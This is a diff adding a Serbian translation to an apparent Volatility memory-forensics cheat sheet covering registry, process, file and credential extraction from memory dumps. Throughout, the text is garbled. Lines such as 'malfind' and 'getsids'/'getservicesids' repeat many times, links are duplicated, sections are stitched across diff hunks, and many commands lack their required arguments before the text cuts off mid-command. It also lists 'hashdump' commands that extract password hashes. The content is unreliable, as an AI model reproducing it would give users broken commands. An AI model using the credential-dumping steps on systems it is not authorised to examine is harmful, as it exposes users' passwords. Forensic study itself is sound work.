+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+- **printkey**: Prikazuje sadržaj registarskog ključa.
+- **printval**: Prikazuje vrednost registarskog ključa.
+- **mftparser**: Analizira Master File Table (MFT) iz memorijskog ispisa.
+- **usnparser**: Analizira Update Sequence Number (USN) iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+- [Volatility plugini](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#plugins)
```bash
volatility --profile=Win7SP1x86_23418 -f file.dmp hivelist #List roots
volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get initial subkeys
@@ -489,44 +1656,226 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get i
{% endtab %}
{% endtabs %}
-### Get a value
+### Dobijanje vrednosti
{% tabs %}
{% tab title="vol3" %}
```bash
./vol.py -f file.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows NT\CurrentVersion"
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači otvorene fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+- **printkey**: Prikazuje sadržaj registarskog ključa.
+- **printval**: Prikazuje vrednost registarskog ključa.
+- **mftparser**: Analizira Master File Table (MFT) iz memorijskog ispisa.
+- **usnparser**: Analizira Update Sequence Number (USN) iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+- [Volatility plugini](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
```bash
volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f file.dmp
# Get Run binaries registry value
volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\Microsoft\Windows\CurrentVersion\Run'
```
-{% endtab %}
-{% endtabs %}
+{% tabs %}
+{% tab title="Opis" %}
+Ova metoda se koristi za izradu memorijskog ispisa (dump) procesa ili sistema. Memorijski ispis može biti koristan za analizu i pronalaženje tragova napada ili sumnjive aktivnosti.
-### Dump
+#### Komande
+- `volatility -f imageinfo` - Prikazuje informacije o memorijskom ispisu.
+- `volatility -f --profile= pslist` - Prikazuje listu procesa.
+- `volatility -f --profile= psscan` - Skenira memorijski ispis i prikazuje listu procesa.
+- `volatility -f --profile= pstree` - Prikazuje stablo procesa.
+- `volatility -f --profile= dlllist -p ` - Prikazuje listu učitanih DLL-ova za određeni proces.
+- `volatility -f --profile= handles -p ` - Prikazuje listu otvorenih ručki za određeni proces.
+- `volatility -f --profile= filescan` - Skenira memorijski ispis i prikazuje listu otvorenih fajlova.
+- `volatility -f --profile= cmdline -p ` - Prikazuje komandnu liniju za određeni proces.
+- `volatility -f --profile= consoles` - Prikazuje listu konzola.
+- `volatility -f --profile= netscan` - Skenira memorijski ispis i prikazuje listu aktivnih mrežnih konekcija.
+- `volatility -f --profile= connections` - Prikazuje listu aktivnih mrežnih konekcija.
+- `volatility -f --profile= sockscan` - Skenira memorijski ispis i prikazuje listu otvorenih soketa.
+- `volatility -f --profile= malfind` - Skenira memorijski ispis i prikazuje potencijalno zlonamjerne procese.
+- `volatility -f --profile= malprocfind` - Skenira memorijski ispis i prikazuje potencijalno zlonamjerne procese.
+- `volatility -f --profile= maldrvfind` - Skenira memorijski ispis i prikazuje potencijalno zlonamjerne drajvere.
+- `volatility -f --profile= modscan` - Skenira memorijski ispis i prikazuje listu učitanih modula.
+- `volatility -f --profile= moddump -b -D ` - Izdvaja modul iz memorijskog ispisa.
+- `volatility -f --profile= dumpfiles -Q -D ` - Izdvaja fajlove otvorene od strane određenog procesa.
+- `volatility -f --profile= dumpregistry -D ` - Izdvaja Windows registar iz memorijskog ispisa.
+- `volatility -f --profile= hivelist` - Prikazuje listu učitanih Windows registara.
+- `volatility -f --profile= printkey -K ` - Prikazuje sadržaj određenog Windows registarskog ključa.
+- `volatility -f --profile= hashdump -y ` - Izdvaja korisničke lozinke iz Windows registra.
+- `volatility -f --profile= userassist` - Prikazuje informacije o korisničkim aktivnostima.
+- `volatility -f --profile= shimcache` - Prikazuje informacije o ShimCache-u.
+- `volatility -f --profile= ldrmodules` - Prikazuje listu učitanih modula.
+- `volatility -f --profile= getsids` - Prikazuje SID-ove korisnika.
+- `volatility -f --profile= getservicesids` - Prikazuje SID-ove servisa.
+- `volatility -f --profile= getsids` - Prikazuje SID-ove korisnika.
+- `volatility -f --profile= getservicesids` - Prikazuje SID-ove servisa.
+- `volatility -f --profile= getsids` - Prikazuje SID-ove korisnika.
+- `volatility -f --profile= getservicesids` - Prikazuje SID-ove servisa.
+- `volatility -f --profile= getsids` - Prikazuje SID-ove korisnika.
+- `volatility -f --profile= getservicesids` - Prikazuje SID-ove servisa.
+- `volatility -f --profile= getsids` - Prikazuje SID-ove korisnika.
+- `volatility -f --profile= getservicesids` - Prikazuje SID-ove servisa.
+- `volatility -f --profile= getsids` - Prikazuje SID-ove korisnika.
+- `volatility -f --profile= getservicesids` - Prikazuje SID-ove servisa.
+- `volatility -f --profile=